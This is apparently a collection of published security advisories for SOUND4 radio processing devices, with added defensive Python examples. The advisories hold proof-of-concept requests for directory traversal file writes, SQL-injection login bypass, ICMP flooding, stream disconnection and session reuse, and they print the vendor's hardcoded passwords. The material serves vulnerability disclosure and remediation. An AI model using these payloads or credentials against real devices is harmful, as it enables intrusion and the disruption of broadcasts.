<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Directory Traversal File Write Exploit<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application suffers from an unauthenticated directory traversal<br />file write vulnerability. 
Input passed through the 'filename' POST parameter<br />called by the 'upgrade.php' script is not properly verified before being used<br />to upload .upgbox Firmware files. This can be exploited to write to arbitrary<br />locations on the system via directory traversal attacks.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5730<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5730.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />POST /cgi-bin/upload.cgi HTTP/1.1<br />Host: RAAAADIOOO<br />Content-Type: multipart/form-data; boundary=----zzzzz<br />User-Agent: TheViewing/05<br />Accept-Encoding: gzip, deflate<br /><br />------zzzzz<br />Content-Disposition: form-data; name="upgfile"; filename="../../../../../../../tmp/pwned"<br />Content-Type: application/octet-stream<br /><br />t00t<br />------zzzzz<br />Content-Disposition: form-data; name="submit"<br /><br />Do it<br />------zzzzz--<br /></code></pre>
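<p>Added example, not part of the advisory or the vendor's code: one way a firmware upload handler can treat the multipart <code>filename</code> value so that the request shown above cannot leave the upload directory. The directory layout, the naming rule and the function names are assumptions; only the <code>.upgbox</code> extension and the sample traversal filename come from the advisory.</p>

```python
import os
import re
import tempfile
from pathlib import Path

# Assumption: firmware images are named like "impact-2.15.upgbox".
ALLOWED_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}\Z")
ALLOWED_SUFFIX = ".upgbox"  # extension named in the advisory

# First entry is the filename from the advisory's request; the rest are constructed.
CONSTRUCTED_NAMES = [
    "../../../../../../../tmp/pwned",
    "impact-2.15.upgbox",
    "..\\..\\fw.upgbox",
    "shell.php",
]


class RejectedUpload(ValueError):
    """Raised when a client-supplied filename is not acceptable."""


def safe_upload_path(upload_dir, client_filename):
    """Return the absolute path inside upload_dir for this upload, or raise."""
    if "\x00" in client_filename:
        raise RejectedUpload("NUL byte in filename")
    # Treat both separators as path separators, whatever the host OS is,
    # and reject instead of silently stripping directory components.
    if "/" in client_filename or "\\" in client_filename:
        raise RejectedUpload("directory components are not accepted")
    if not ALLOWED_NAME.match(client_filename):
        raise RejectedUpload("filename outside the allowed character set")
    if not client_filename.lower().endswith(ALLOWED_SUFFIX):
        raise RejectedUpload("not a firmware file")
    base = Path(upload_dir).resolve(strict=True)
    candidate = (base / client_filename).resolve()
    # resolve() follows symlinks, so a link planted in upload_dir that points
    # elsewhere fails this containment check as well.
    if candidate.parent != base:
        raise RejectedUpload("resolved path escapes the upload directory")
    return str(candidate)


def store_upload(upload_dir, client_filename, data):
    """Validate the name, then create the file without following links."""
    path = safe_upload_path(upload_dir, client_filename)
    # O_EXCL refuses to overwrite an existing file; O_NOFOLLOW (where the
    # platform has it) refuses a symlink created between check and open.
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


def demo():
    """Run the sample filenames through the handler in a scratch directory."""
    results = {}
    with tempfile.TemporaryDirectory() as scratch:
        for name in CONSTRUCTED_NAMES:
            try:
                store_upload(scratch, name, b"t00t")
                results[name] = "stored"
            except RejectedUpload as exc:
                results[name] = "rejected: %s" % exc
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print("%-40r %s" % (name, outcome))
```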
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (sound4server) Hardcoded Credentials<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Desc: The server binary has hard-coded credentials within its Linux and<br />Windows distribution image. 
These sets of credentials are never exposed<br />to the end-user and cannot be changed through any normal operation of the<br />device. To add/modify other credentials you need to use the SOUND4 Remote<br />Control thick client.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /> Windows 10<br /> SOUND4 Server v4.1.102<br /> SOUND4 Remote Control v4.3.17<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5729<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5729.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> grep -irnH -A2 -B2 "Password=" /opt/sound4/sound4server<br /><br />/opt/sound4/sound4server-1232889-Active=%s;<br />/opt/sound4/sound4server-1232890-<br />/opt/sound4/sound4server:1232891:ActiveOnPassword=%s;<br />/opt/sound4/sound4server-1232892-<br />/opt/sound4/sound4server-1232893-<br />--<br />/opt/sound4/sound4server-1233290-<br />/opt/sound4/sound4server-1233291-<br />/opt/sound4/sound4server:1233292:Password='hes2faB7Zub7chuF';<br />/opt/sound4/sound4server-1233293-UserType='BrokenConnection_User';<br />/opt/sound4/sound4server-1233294-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233302-<br />/opt/sound4/sound4server-1233303-more_rightusers<br />/opt/sound4/sound4server:1233304:Password='hes2faB7Zub7chuF';<br />/opt/sound4/sound4server-1233305-UserType='LocalConnection_User';<br />/opt/sound4/sound4server-1233306-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233312-<br />/opt/sound4/sound4server-1233313-_local_rds_<br />/opt/sound4/sound4server:1233314:Password='FaK7Kaph';<br />/opt/sound4/sound4server-1233315-UserType='LocalConnection_RDS';<br 
/>/opt/sound4/sound4server-1233316-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233323-_local_vu_<br />/opt/sound4/sound4server-1233324-<br />/opt/sound4/sound4server:1233325:Password='PrE4awrE';<br />/opt/sound4/sound4server-1233326-UserType='LocalConnection_VU';<br />/opt/sound4/sound4server-1233327-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233331-_local_sw_<br />/opt/sound4/sound4server-1233332-<br />/opt/sound4/sound4server:1233333:Password='bras2awA';<br />/opt/sound4/sound4server-1233334-UserType='LocalConnection_Switch';<br />/opt/sound4/sound4server-1233335-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233340-<br />/opt/sound4/sound4server-1233341-<br />/opt/sound4/sound4server:1233342:Password='ELhp7e5DkpwVUAfJ';<br />/opt/sound4/sound4server-1233343-UserType='LocalConnection_User';<br />/opt/sound4/sound4server-1233344-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233363-<br />/opt/sound4/sound4server-1233364-<br />/opt/sound4/sound4server:1233365:Password='bDAtfKJ0';<br />/opt/sound4/sound4server-1233366-UserType='LocalConnection_FrontPanel';<br />/opt/sound4/sound4server-1233367-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233370-<br />/opt/sound4/sound4server-1233371-<user="Admin"><br />/opt/sound4/sound4server:1233372: Password="21232F297A57A5A743894A0E4A801FC3"; // admin<br />/opt/sound4/sound4server-1233373- UserType="Superadmin";<br />/opt/sound4/sound4server-1233374- CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1233748-<br />/opt/sound4/sound4server-1233749-<br />/opt/sound4/sound4server:1233750:Password="SroqZQesQAJgaLF";<br />/opt/sound4/sound4server-1233751-UserType="_local_LoadPreset_";<br />/opt/sound4/sound4server-1233752-CanBeRemove=false;<br />--<br />/opt/sound4/sound4server-1237511-<br />/opt/sound4/sound4server-1237512-<br />/opt/sound4/sound4server:1237513:Password="";<br />/opt/sound4/sound4server-1237514-UserType="PresetSharing";<br 
/>/opt/sound4/sound4server-1237515-UserType="PresetSharing";<br />--<br />/opt/sound4/sound4server-1237517-CanBeModify=false;<br />/opt/sound4/sound4server-1237518-Active=false;<br />/opt/sound4/sound4server:1237519:ActiveOnPassword=true;<br />/opt/sound4/sound4server-1237520-CanBeList=false;<br />/opt/sound4/sound4server-1237521-PinEnable=false;<br /><br />---<br /><br />> C:\>strings.exe "C:\Program Files\SOUND4\Server\SOUND4 Server.exe" |findstr /spina:d "Password="<br />204080:Password="SroqZQesQAJgaLF";<br />204276:Password="";<br />204282:ActiveOnPassword=true;<br />205582:Password='bDAtfKJ0';<br />205589: Password="21232F297A57A5A743894A0E4A801FC3"; // admin<br />205594:Password='ELhp7e5DkpwVUAfJ';<br />205605:Password='PrE4awrE';<br />205611:Password='bras2awA';<br />205616:Password='hes2faB7Zub7chuF';<br />205624:Password='FaK7Kaph';<br />205683:Password='hes2faB7Zub7chuF';<br />205836:ActiveOnPassword=%s;<br />205845:Password=%s;<br /></code></pre>
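<p>Added example, not part of the advisory or the vendor's tooling: a release-gate check that does what the <code>grep</code> and <code>strings</code> runs above do, but separates real embedded values from format templates such as <code>Password=%s;</code> and ignores <code>ActiveOnPassword=</code>. It reports a length and a short SHA-256 fingerprint instead of the value, so the report can show that the same credential ships in several images without repeating it. The image bytes below are constructed and the function names are assumptions.</p>

```python
import hashlib
import re

# Printable-ASCII runs of at least 6 bytes, the same idea as strings(1).
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{6,}")
# Password=<value>, quoted or bare. The lookbehind skips keys that merely end
# in "Password", such as ActiveOnPassword= in the output above.
ASSIGNMENT = re.compile(
    rb"""(?<![A-Za-z])Password\s*=\s*(?:'([^']*)'|"([^"]*)"|([^;\s]+))"""
)
HEX32 = re.compile(rb"[0-9A-Fa-f]{32}\Z")

# Constructed sample images: a few header bytes plus NUL-separated strings.
CONSTRUCTED_LINUX_IMAGE = (
    b"\x7fELF\x01\x01" + b"\x00" * 8
    + b"ActiveOnPassword=%s;\x00"
    + b"Password=%s;\x00"
    + b"Password='EXAMPLE-not-real';\x00UserType='LocalConnection_User';\x00"
    + b"Password=\"\";\x00UserType=\"PresetSharing\";\x00"
    + b" Password=\"0123456789ABCDEF0123456789ABCDEF\"; // constructed\x00"
)
CONSTRUCTED_WINDOWS_IMAGE = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"Password=%s;\x00"
    + b"Password='EXAMPLE-not-real';\x00"
)


def classify(value, quoted):
    """Return a finding kind, or None for a format template."""
    if not quoted and b"%" in value:
        return None                      # e.g. Password=%s; filled in at run time
    if value == b"":
        return "empty-password"
    if HEX32.match(value):
        return "embedded-digest"         # 32 hex digits, shaped like an unsalted hash
    return "embedded-literal"


def scan_image(blob):
    """List embedded Password= values in a binary image, without the values."""
    findings = []
    for run in PRINTABLE_RUN.finditer(blob):
        for m in ASSIGNMENT.finditer(run.group()):
            single, double, bare = m.groups()
            quoted = bare is None
            if bare is not None:
                value = bare
            else:
                value = single if single is not None else double
            kind = classify(value, quoted)
            if kind is None:
                continue
            findings.append({
                "offset": run.start() + m.start(),
                "kind": kind,
                "length": len(value),
                "fingerprint": hashlib.sha256(value).hexdigest()[:12],
            })
    return findings


def shared_fingerprints(images):
    """Map fingerprint -> image names for values present in more than one image."""
    seen = {}
    for name, blob in images.items():
        for finding in scan_image(blob):
            if finding["kind"] != "empty-password":
                seen.setdefault(finding["fingerprint"], set()).add(name)
    return {fp: sorted(names) for fp, names in seen.items() if len(names) > 1}


if __name__ == "__main__":
    for f in scan_image(CONSTRUCTED_LINUX_IMAGE):
        print(f)
    print(shared_fingerprints({"linux": CONSTRUCTED_LINUX_IMAGE,
                               "windows": CONSTRUCTED_WINDOWS_IMAGE}))
```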
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (ping/traceroute) ICMP Flood Attack<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Desc: The application allows an unauthenticated attacker to send network<br />signals to an arbitrary target host that can be abused in an ICMP flooding<br />attack. 
This includes the utilisation of the ping, traceroute and nslookup<br />commands through ping.php, traceroute.php and dns.php respectively.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5728<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5728.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> curl -XPOST -sk https://RADIO/ping.php --data "ping_host=localhost&networkid=251" # ping -c 3 -W 5 %s<br />> curl -XPOST -sk https://RADIO/traceroute.php --data "traceroute_host=localhost&networkid=251"<br />> curl -XPOST -sk https://RADIO/dns.php --data "dns_host=localhost&networkid=251"<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Authentication Bypass<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Desc: The application suffers from an SQL Injection vulnerability. Input<br />passed through the 'username' POST parameter in 'index.php' is not properly<br />sanitised before being returned to the user or used in SQL queries. 
This<br />can be exploited to manipulate SQL queries by injecting arbitrary SQL code<br />and bypass the authentication mechanism.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5727<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />POST /index.php HTTP/1.1<br /><br />username='+joxy--+z&password=05C13NCE<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (password) Authentication Bypass<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Desc: The application suffers from an SQL Injection vulnerability. Input<br />passed through the 'password' POST parameter in 'index.php' is not properly<br />sanitised before being returned to the user or used in SQL queries. 
This<br />can be exploited to manipulate SQL queries by injecting arbitrary SQL code<br />and bypass the authentication mechanism.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5726<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5726.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />POST /index.php HTTP/1.1<br /><br />username=t00t&password='+joxy--+z<br /></code></pre>
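<p>Added example covering both the <code>username</code> and the <code>password</code> advisory above; it is not the device's code, and the advisories do not show the real query or database. A string-built lookup is set beside a login that binds the username as a parameter and never places the password in a query at all. The table, the account and the function names are constructed; the test value is the form-decoded string from the two requests above.</p>

```python
import hashlib
import hmac
import os
import sqlite3
from urllib.parse import unquote_plus

ITERATIONS = 100_000
DUMMY_SALT = b"\x00" * 16
# The value sent in the advisories' requests, form-decoded ('+' becomes a space).
ADVISORY_VALUE = unquote_plus("'+joxy--+z")


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def make_db():
    """In-memory user table holding one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pwhash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("operator", salt, hash_password("constructed-passphrase", salt)))
    return db


def lookup_concat(db, username):
    """'Before' form: the request value becomes part of the statement text."""
    sql = "SELECT salt, pwhash FROM users WHERE username='" + username + "'"
    return db.execute(sql).fetchone()


def parsed_as_sql(db, value):
    """True when a request value reaches the SQL parser and breaks the statement.

    A bound parameter can never do this, so a syntax error triggered by
    request data is by itself proof of an injectable query.
    """
    try:
        lookup_concat(db, value)
    except sqlite3.OperationalError:
        return True
    return False


def login(db, username, password):
    """Hardened form: username is bound, the password is only hashed and compared."""
    row = db.execute(
        "SELECT salt, pwhash FROM users WHERE username = ?", (username,)
    ).fetchone()
    # Hash even when the user does not exist, so timing does not reveal it.
    salt, stored = row if row else (DUMMY_SALT, b"")
    candidate = hash_password(password, salt)
    return row is not None and hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    db = make_db()
    print("value reaches the parser in the 'before' form:", parsed_as_sql(db, ADVISORY_VALUE))
    print("username field:", login(db, ADVISORY_VALUE, "05C13NCE"))
    print("password field:", login(db, "t00t", ADVISORY_VALUE))
    print("valid account :", login(db, "operator", "constructed-passphrase"))
```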
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Disconnect Webmonitor User (DoS)<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Desc: The application allows an unauthenticated attacker to disconnect the<br />current monitoring user from listening/monitoring and take over the radio<br />stream on a specific channel.<br /><br />------------------------------------------------------------------------<br />/var/www/killffmpeg.php:<br />------------------------<br /><br /><?php<br />$ret=0;<br />exec("bash -c 'kill $(cat /tmp/webplay.pid)'",$out,$ret);<br />echo $ret;<br />?><br />------------------------------------------------------------------------<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5725<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5725.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> curl -sko -nul https://RADIO/killffmpeg.php<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Insufficient Session Expiration<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: 4.1.102<br /><br />Desc: The application suffers from insufficient session expiration. This<br />occurs when the web application permits an attacker to reuse old session<br />credentials or session IDs for authorization. 
Insufficient session expiration<br />increases the device's exposure to attacks that can steal or reuse user's<br />session identifiers.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5724<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5724.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />Session valid after 96 hours:<br /><br />POST /checklogin.php HTTP/1.1<br />Host: RADIO<br />Cookie: PHPSESSID=q9rooqkl3kl20aianmveimu23q; monitor-mp3-bitrate=128; monitor-volume=1; settings_accordion_active=3; netdiagsaccordion_last=0<br />Content-Length: 34<br />Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://RADIO<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://RADIO/linkandshare.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />session=q9rooqkl3kl20aianmveimu23q<br /><br /><br />HTTP/1.1 200 OK<br />Date: Sat, 03 Jan 1970 11:13:19 GMT<br />Server: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1<br />X-Powered-By: PHP/7.1.1<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Vary: User-Agent<br />Content-Length: 1<br />Connection: close<br />Content-Type: text/html; 
charset=UTF-8<br /><br />0<br /></code></pre>
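<p>Added example, not the device's code: a server-side session table that enforces both an idle timeout and an absolute lifetime, so an identifier like the one replayed above after 96 hours is refused. The captured response carries a 1970 <code>Date</code> header, so this sketch measures age with a monotonic clock instead of wall-clock time. The two limits and all names are assumptions.</p>

```python
import hashlib
import secrets
import time

IDLE_TIMEOUT = 15 * 60            # assumption: 15 minutes without a request
ABSOLUTE_LIFETIME = 8 * 60 * 60   # assumption: 8 hours since login, activity or not


class SessionStore:
    """Server-side session records keyed by a hash of the session id."""

    def __init__(self, clock=time.monotonic,
                 idle=IDLE_TIMEOUT, absolute=ABSOLUTE_LIFETIME):
        self._clock = clock
        self._idle = idle
        self._absolute = absolute
        self._sessions = {}

    @staticmethod
    def _key(session_id):
        # Only the hash is stored, so a dump of the table yields no usable ids.
        return hashlib.sha256(session_id.encode("utf-8")).hexdigest()

    def create(self, user):
        session_id = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[self._key(session_id)] = {
            "user": user, "created": now, "last_seen": now,
        }
        return session_id

    def validate(self, session_id):
        """Return the user for a live session, else None. Expired records are removed."""
        key = self._key(session_id)
        record = self._sessions.get(key)
        if record is None:
            return None
        now = self._clock()
        too_old = now - record["created"] > self._absolute
        too_idle = now - record["last_seen"] > self._idle
        if too_old or too_idle:
            del self._sessions[key]
            return None
        record["last_seen"] = now
        return record["user"]

    def destroy(self, session_id):
        """Logout: the id stops working immediately, not when a cookie expires."""
        self._sessions.pop(self._key(session_id), None)

    def active_count(self):
        return len(self._sessions)
```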
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Authorization Bypass (IDOR)<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Desc: The application is vulnerable to insecure direct object references<br />that occur when the application provides direct access to objects based<br />on user-supplied input. 
As a result of this vulnerability attackers can<br />bypass authorization and access the hidden resources on the system and<br />execute privileged functionalities.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5723<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5723.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />(GET|POST) /** HTTP/1.1<br /><br />/var/www/:<br />----------<br /><br />.SOUND4<br />about.php<br />actioninprogress.php<br />broken_error.php<br />cfg_filewatch.xml<br />cfg_filewatch_specific.xml<br />checklogin.php<br />checkserver.php<br />config.php<br />datahandlerdlg.php<br />descrxml.php<br />dns.php<br />downloads<br />downloads.php<br />fullrebootsystem.php<br />global.php<br />globaljs.php<br />guifactorysettings.xml<br />guixml.php<br />guixml_error.php<br />header.php<br />images<br />index.php<br />isreboot.php<br />jquery-3.2.1.min.js<br />jquery-plugins<br />jquery-ui-custom<br />jquery-ui-i18n.js<br />jquery-ui.css<br />jquery-ui.js<br />jquery.js<br />jquery.ui.touch-punch.min.js<br />killffmpeg.php<br />linkandshare.php<br />login.php<br />logout.php<br />monitor.php<br />networkdiagnostic.php<br />partialrebootsystem.php<br />ping.php<br />playercfg.xml<br />rebootsystem.php<br />restoreinprogress.php<br />script.min.js<br />secure.php<br />serverinprogress.php<br />settings.php<br />setup.php<br />setup_ethernet.php<br />style.min.css<br />traceroute.php<br />upgrade<br />upgrade.php<br />upgradeinprogress.php<br />uploaded_guicustomload.php<br />uploaded_kantarlic.php<br />uploaded_licfile.php<br />uploaded_logo.php<br />uploaded_presetfile.php<br 
/>uploaded_restorefile.php<br />uploaded_upgfile.php<br />validate_tz.php<br />ws.min.js<br />ws.php<br />wsjquery-class.min.js<br />www-data-handler.php<br /><br />/usr/cgi-bin/:<br />--------------<br /><br />(GET|POST) /** HTTP/1.1<br /><br />backup.cgi<br />cgi-form-data<br />downloadkantarlic.cgi<br />ffmpeg.cgi<br />frontpanel<br />getlogs.cgi<br />getlogszip.cgi<br />guicustomsettings.cgi<br />guicustomsettingsload.cgi<br />guifactorysettings.cgi<br />importpreset.cgi<br />loghandler.php<br />logo<br />logoremove.cgi<br />logoupload.cgi<br />phptail.php<br />printenv<br />printenv.vbs<br />printenv.wsf<br />restore.cgi<br />restorefactory.cgi<br />test-cgi<br />upgrade.cgi<br />upload.cgi<br /></code></pre>
